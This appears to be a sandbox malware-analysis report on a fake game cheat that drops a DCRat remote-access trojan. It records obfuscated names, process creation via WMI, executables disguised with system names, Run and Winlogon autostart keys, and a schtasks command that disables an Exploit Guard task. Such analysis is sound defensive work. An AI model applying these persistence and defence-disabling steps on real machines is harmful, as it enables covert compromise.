                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ruGDE8wHCs1LugFJYDC.csHigh entropy of concatenated method names: 'kB38y8dk5oW2xdKQBrP', 'G6ZbBJdgUO6CLx48d5K', 'dDPudsdxa6pJGbmnmKi', 'b0GZXwdH7ygfxCFOP1w', 'BkAGPB7unW', 'oZOOPmdb3qMR2OdZTra', 'N4YP0Cd1iuhaXhBVh26', 'NS4jk6dO3LJwCCJHcdh', 'cjeMFidvcwPeWVu3eAE', 'G4SHC9dLD6xHeQMsvhm'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, zjoE3wqcjVQABWnuZwJ.csHigh entropy of concatenated method names: 'LDwqLbeMqa', 'bU33lM9CY6QbqkUuSXQ', 'edxOpB9puVMW4WRBXYU', 'u2okGP9MG0fEDvWvjeu', 'kDPEj09ExKrMrEl81QS', 'dv3GOp9o4yBpxyypgav', '_3Xh', 'YZ8', '_123', 'G9C'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, nldwCqME01ywJTeITCX.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'v0e5Yer2Yh', 'gGg2tdWOIW', 'hBV53OseBt', 'cuvwY2tiF6T0xlmhlRC', 'DbBHZOtP9vQ03rGX3cr', 'zyxEwctXsbdURV0wraa', 'T257FqtW9ce8SpJEWSC', 'SFoZ3ZtwJPZTejL75Gm'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, jVQRA9qILNDR4ueVNdL.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'oktDTryxsKvOiykeSyp', 'aSXGyWyHbHVuvujaXVW', 'j9DsnTykvOXD7VqlgNy', 'VsEnKxygPhd1RbnlKLC', 'f2ttHIyjk17CiWnkXlh', 'LBdBwxyFOHpWMnIyeFy'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ykUT5HnIRnmAOVRT6X.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'eY2MbUB0PecUyh3V2wW', 'd8pkn0BAPJITW9DDqcq', 'Tv5aE7BR4L0wAL8jA7R', 'mMPINVBiepktgJ302Pr', 'M4gHVpBP6fZUQTFsMM1', 'cPKUSUBX6ioO9PN9JUd'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, zy6GHpNEirDwbeMqaG.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'YfPN9GIe92ZZpZ9hmoH', 'ADWV0RIdwoLO8FWq0Ir', 'c0DhSCI4rJqavKqnUCf', 'wHH5RqIZVucg3SkrGbq', 'pujxo0IaN1clKxhtVbC', 'XqoEwiISvg6R27NyE7H'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, j8yowCfSyTNdR3Qg4Jh.csHigh entropy of concatenated method names: 'z4DMLvf7yf', 'zwLMk4iAhK', 'IYjjs7PluGqUdZbLiIU', 'o2O2kGPrC5Li2fny4MT', 'onGWsrPDJhjoSEs4QKE', 'ECpQQ1PNIZyjHTTKWXl', 'skwvxXP31xojtFQeYcO', 'OUkWPoPtURsH0OCLxTV', 'SVewE2Px9vtFQksqGyF', 'jJ24xJPHrOK9SaMtxTS'

                        Persistence and Installation Behavior

                        barindex
                        Creates processes via WMI
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Drops PE files with benign system names
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\AppReadiness\dwm.exeJump to dropped file
                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                        Source: C:\blockweb\portrefNet.exeFile created: C:\blockweb\RuntimeBroker.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\AppReadiness\dwm.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Recovery\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\blockweb\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Users\Default\ApplicationFrameHost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeFile created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeFile created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeFile created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeFile created: C:\blockweb\portrefNet.exeJump to dropped file
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeFile created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\blockweb\WmiPrvSE.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Users\user\Videos\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Users\user\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Users\Default\ApplicationFrameHost.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Users\user\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\AppReadiness\dwm.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exeJump to dropped file

                        Boot Survival

                        barindex
                        Creates an autostart registry key pointing to binary in C:\Windows
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Creates an undocumented autostart registry key
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Source: C:\blockweb\portrefNet.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                        Creates multiple autostart registry keys
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBroker
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Drops PE files to the user root directory
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Users\Default\ApplicationFrameHost.exeJump to dropped file
                        Source: C:\blockweb\portrefNet.exeFile created: C:\Users\user\ukzoUeHPfeDwGdTDRNL.exeJump to dropped file
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
